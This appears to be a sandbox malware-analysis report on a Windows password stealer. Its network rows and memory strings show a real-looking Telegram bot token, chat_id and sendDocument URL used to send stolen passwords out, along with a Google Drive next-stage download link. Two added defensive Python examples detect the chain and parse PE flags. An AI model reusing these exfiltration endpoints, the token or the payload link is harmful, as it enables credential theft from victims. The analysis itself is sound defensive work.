            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd31ba864dec1b | Host: api.telegram.org | Content-Length: 1090 | Connection: Keep-Alive
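The request rows above trace the stealer's whole network chain: a public-IP lookup against checkip.dyndns.org with a hard-coded, long-obsolete MSIE 6.0 User-Agent, a geolocation query to reallyfreegeoip.org, a Telegram Bot API sendDocument POST whose URL path carries the bot token and whose caption names the victim user, the stolen data type and the external IP, and (via the drive.google.com / drive.usercontent.google.com queries) a next-stage download from a Google Drive share. The following is an added example, not code from the report or from Joe Sandbox: a small Python classifier that runs over constructed proxy-style request records, labels each stage, and pulls out the bot id, token, chat_id and caption fields so the token can be reported to Telegram and the chat blocked. The Request record shape, the sample session, and the Telegram token and chat_id in it are constructed (same shape as real ones, not the values in the report).

```python
"""Classify proxy/IDS HTTP records into the stealer's C2 chain stages.

Added example, not part of the Joe Sandbox report. The Request record and the
sample session below are constructed stand-ins; the Telegram token and chat_id
are made up (same shape as a real token, not the one in the report).
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, unquote, urlsplit

# User-Agent seen on every checkip.dyndns.org request in the report: a fixed,
# long-obsolete string that no current browser sends, so it is a usable signature.
STEALER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Telegram Bot API paths are /bot<numeric id>:<secret>/<method>.
TELEGRAM_RE = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(?P<method>\w+)")
# Google Drive direct-download links carry the file id as a query parameter.
DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}


@dataclass
class Request:
    method: str
    host: str
    path: str
    headers: dict = field(default_factory=dict)


def classify(req):
    """Return (stage, details) for a request in the chain, or None if unrelated."""
    host = req.host.lower()
    parts = urlsplit(req.path)
    query = parse_qs(parts.query)
    ua = req.headers.get("User-Agent", "")

    if host in {"checkip.dyndns.org", "checkip.dyndns.com"}:
        # Public-IP discovery; the hard-coded UA upgrades it from "suspicious" to "stealer".
        stage = "ip_check_stealer_ua" if ua == STEALER_UA else "ip_check"
        return stage, {"ua": ua}

    if host == "reallyfreegeoip.org" and parts.path.startswith("/xml/"):
        # Geolocation of the IP just learned; the sample uses it to decide whether to run.
        return "geoip_lookup", {"ip": parts.path[len("/xml/"):]}

    if host == "api.telegram.org":
        m = TELEGRAM_RE.match(parts.path)
        if not m:
            return "telegram_api", {}
        # Caption format in the report: "<user> / <module> / <external ip>".
        caption = unquote(query.get("caption", [""])[0])
        fields = [f.strip() for f in caption.split("/")]
        three = len(fields) == 3
        return "telegram_exfil", {
            "token": m["token"],                  # the credential to report / revoke
            "bot_id": m["token"].split(":")[0],
            "method": m["method"],
            "chat_id": query.get("chat_id", [None])[0],
            "victim_user": fields[0] if three else None,
            "module": fields[1] if three else None,
            "victim_ip": fields[2] if three else None,
        }

    if host in DRIVE_HOSTS and query.get("export") == ["download"]:
        # Loader-style next-stage fetch from a Drive share.
        return "drive_stage_download", {"file_id": query.get("id", [None])[0]}

    return None


def chain_summary(requests):
    """Count stages across a session and say whether the full exfil chain was seen."""
    stages = {}
    for req in requests:
        hit = classify(req)
        if hit:
            stages[hit[0]] = stages.get(hit[0], 0) + 1
    full = "telegram_exfil" in stages and (
        "ip_check_stealer_ua" in stages or "ip_check" in stages)
    return {"stages": stages, "full_chain": full}


# Constructed sample session, in the order the report shows the stages.
SAMPLE = [
    Request("GET", "drive.google.com", "/uc?export=download&id=1ExampleFileIdNotReal_abcdefghij"),
    Request("GET", "checkip.dyndns.org", "/", {"User-Agent": STEALER_UA}),
    Request("GET", "reallyfreegeoip.org", "/xml/203.0.113.7"),
    Request("POST", "api.telegram.org",
            "/bot1234567890:AAExampleTokenNotReal0123456789abcd/sendDocument"
            "?chat_id=1000000001&caption=user%20/%20Passwords%20/%20203.0.113.7"),
    Request("GET", "www.example.com", "/index.html", {"User-Agent": "Mozilla/5.0"}),
]

if __name__ == "__main__":
    for r in SAMPLE:
        print(f"{r.method} {r.host}{r.path[:60]} -> {classify(r)}")
    print(chain_summary(SAMPLE))
```

Matching the full User-Agent string is deliberate: it is byte-identical on all eleven checkip requests in the report, while a bare hit on checkip.dyndns.org is only a weak signal. The Telegram token is the item that matters operationally; the example extracts it from the path but never calls the API.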
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndn
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: 4NG0guPiKA.exe, 00000003.00000003.2534442338.000000003593A000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.2535110056.0000000035940000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002B17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/~
Source: 4NG0guPiKA.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332EB000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgHI
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: 4NG0guPiKA.exe, 00000003.00000002.2625334831.00000000046D0000.00000004.00001000.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt
Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXttou
Source: 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: 4NG0guPiKA.exe, 00000003.00000003.1660861517.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download
Source: 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=downloadq
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443, seen in both directions (local port -> 443 and 443 -> local port) for each of these 37 local ports: 49708, 49709, 49711, 49712, 49714, 49716, 49720, 49722, 49725, 49728, 49730, 49732, 49734, 49736, 49738, 49740, 49742, 49744, 49746, 49748, 49750, 49752, 49754, 49756, 49758, 49760, 49762, 49764, 49766, 49768, 49770, 49772, 49774, 49776, 49778, 49780, 49782
Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 0_2_00404B10, 0_2_0040653F
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_00404B10, 3_2_0040653F
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_000D4328, 3_2_000D66B8, 3_2_000D9048, 3_2_000D19B8, 3_2_000D5F90, 3_2_000D89D0, 3_2_000D2DD1
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_331E331A, 3_2_331E5392, 3_2_331E03AF, 3_2_331EC638, 3_2_331E7628, 3_2_331EF648, 3_2_331ECCA0, 3_2_331EE339, 3_2_331EEBF7, 3_2_331E6A43, 3_2_331EDA89, 3_2_331EAAEA, 3_2_331EB944, 3_2_331E69CB, 3_2_331EC1F2, 3_2_331E69E9, 3_2_331E7848, 3_2_331EF042, 3_2_331EB07F, 3_2_331EE790, 3_2_331E7E1E, 3_2_331E7E3C, 3_2_331E7E9A, 3_2_331E6E91, 3_2_331E6EA0, 3_2_331EDEE1, 3_2_331E7510, 3_2_331EBD88, 3_2_331ECC8E, 3_2_331E748C, 3_2_331E74B1, 3_2_331EB4EC
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_35F2BDF0, 3_2_35F29D10, 3_2_35F296C8, 3_2_35F28650, 3_2_35F2A9B0, 3_2_35F2A360, 3_2_35F2BA97, 3_2_35F2BDE1, 3_2_35F24DB0, 3_2_35F24DA0, 3_2_35F22560, 3_2_35F22550, 3_2_35F29D00, 3_2_35F274C8, 3_2_35F21CB0, 3_2_35F274B8, 3_2_35F21CA0, 3_2_35F26C18, 3_2_35F21400, 3_2_35F2AFF7, 3_2_35F2AFF8, 3_2_35F2AFE8, 3_2_35F267C0, 3_2_35F267B0, 3_2_35F20FA8, 3_2_35F23F70, 3_2_35F23F60, 3_2_35F25F10, 3_2_35F236C0, 3_2_35F236B0, 3_2_35F296B8, 3_2_35F25660, 3_2_35F25650, 3_2_35F28640, 3_2_35F22E10, 3_2_35F229B8, 3_2_35F2A9A0, 3_2_35F229A8, 3_2_35F2F138, 3_2_35F2F12A, 3_2_35F22108, 3_2_35F220FA, 3_2_35F27070, 3_2_35F27061, 3_2_35F21858, 3_2_35F20040, 3_2_35F20037, 3_2_35F24820, 3_2_35F24810, 3_2_35F213F0, 3_2_35F243C8, 3_2_35F243B9, 3_2_35F26368, 3_2_35F2A352, 3_2_35F26358, 3_2_35F27B4F, 3_2_35F23B18, 3_2_35F23B08, 3_2_35F25AB8, 3_2_35F25AA8, 3_2_35F23268, 3_2_35F25207, 3_2_35F25208
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 3_2_3645D6E8, 3_2_3645E8A8, 3_2_364575E8, 3_2_3645E89A
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: String function: 00402B3A appears 45 times
Source: 4NG0guPiKA.exe, 00000003.00000002.2646019179.0000000033017000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 4NG0guPiKA.exe
Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 4NG0guPiKA.exe
Source: 4NG0guPiKA.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Code function: 0_2_0040206A CoCreateInstance
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File created: C:\Users\user\selvsikker
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File created: C:\Users\user\AppData\Local\Temp\nst6785.tmp
Source: 4NG0guPiKA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
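The two static PE rows above (the file characteristics RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, and a .text section flagged IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ) are bit flags in the COFF file header and in the section table. Added example, not from the report or from Joe Sandbox: a standard-library-only header walker that decodes both into the same names the report prints and flags writable-and-executable or non-code executable sections, which packers and loaders commonly leave behind. The two-section PE stub it parses is constructed so the block runs offline, and the flag tables are deliberately partial (only the bits relevant here).

```python
"""Decode COFF file characteristics and section flags from a PE header.

Added example, not from the report or Joe Sandbox. build_stub() fabricates a
minimal two-section PE so the parser can run offline; for a real sample call
parse_pe(open(path, "rb").read()).
"""
import struct

# IMAGE_FILE_* characteristics, named the way the report prints them (partial table).
FILE_FLAGS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
# IMAGE_SCN_* section characteristics (partial table).
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE", 0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE",
}
COFF_FMT = "<HHIIIHH"         # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab,
                              # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER, Characteristics last


def _names(value, table):
    """Flag names set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    sections = []
    off = e_lfanew + 4 + struct.calcsize(COFF_FMT) + opt_size  # table follows the optional header
    for _ in range(nsections):
        s = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({
            "name": s[0].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": s[1], "raw_size": s[3],
            "raw_flags": s[9], "flags": _names(s[9], SECTION_FLAGS),
        })
        off += struct.calcsize(SECTION_FMT)
    return {"machine": machine, "characteristics": _names(chars, FILE_FLAGS), "sections": sections}


def suspicious_sections(parsed):
    """Names of sections that are writable+executable, or executable but not marked as code."""
    out = []
    for s in parsed["sections"]:
        f = set(s["flags"])
        if "IMAGE_SCN_MEM_EXECUTE" in f and (
                "IMAGE_SCN_MEM_WRITE" in f or "IMAGE_SCN_CNT_CODE" not in f):
            out.append(s["name"])
    return out


def build_stub(file_chars=0x010F, sections=((b".text", 0x60000020), (b".data", 0xC0000040))):
    """Constructed minimal PE: DOS header with e_lfanew, PE sig, COFF header, no optional header."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew -> right after DOS header
    coff = struct.pack(COFF_FMT, 0x014C, len(sections), 0, 0, 0, 0, file_chars)  # 0x014C = i386
    hdrs = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + hdrs


if __name__ == "__main__":
    parsed = parse_pe(build_stub())
    print("file:", ", ".join(parsed["characteristics"]))
    for sec in parsed["sections"]:
        print(sec["name"], ", ".join(sec["flags"]))
    print("suspicious:", suspicious_sections(parsed))
```

The default stub reproduces exactly the flag set the report lists (0x010F for the file, 0x60000020 for .text); passing a section with 0x80000000 added shows the RWX case the check is there to catch.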
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4NG0guPiKA.exe, 00000003.00000002.2649283790.000000003423D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4NG0guPiKA.exe | Virustotal: Detection: 76%
Source: 4NG0guPiKA.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File read: C:\Users\user\Desktop\4NG0guPiKA.exe
            Source: unknownProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: iertutil.dllJump to behavior
